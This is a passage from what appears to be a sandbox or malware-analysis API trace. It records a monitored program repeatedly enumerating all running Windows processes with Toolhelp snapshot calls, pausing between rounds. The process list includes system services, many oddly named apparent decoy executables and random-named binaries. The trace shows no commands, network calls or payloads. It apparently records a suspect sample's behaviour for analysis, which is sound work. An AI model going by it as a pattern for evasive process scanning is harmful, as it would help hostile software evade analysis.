th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0152.456] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0152.457] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0152.458] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.459] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0152.460] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0152.461] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0152.463] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0152.464] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0152.465] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0152.466] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0152.467] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0152.468] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0152.469] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0152.470] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0152.471] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0152.472] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0152.474] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0152.475] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0152.476] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0152.477] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0152.478] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0152.479] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0152.480] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0152.481] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0152.482] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.483] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0152.484] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0152.485] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0152.486] CloseHandle (hObject=0xbc) returned 1 [0152.486] Sleep (dwMilliseconds=0x12c) [0152.799] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0152.803] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.804] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0152.805] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0152.806] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0152.807] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0152.807] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0152.808] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0152.808] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0152.809] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0152.810] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0152.810] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.811] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.812] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.813] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.813] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.814] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0152.815] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.816] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.816] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0152.817] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.818] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0152.820] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0152.821] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0152.822] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0152.823] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.824] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0152.825] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0152.827] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0152.828] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0152.829] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0152.830] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0152.832] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0152.890] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0152.892] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0152.893] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0152.895] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0152.896] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0152.897] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0152.899] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0152.900] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0152.901] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0152.903] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0152.904] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0152.905] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0152.907] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0152.908] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0152.909] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.910] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0152.912] CloseHandle (hObject=0xc4) returned 1 [0152.912] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0152.918] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.918] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0152.919] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0152.920] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0152.921] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0152.922] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 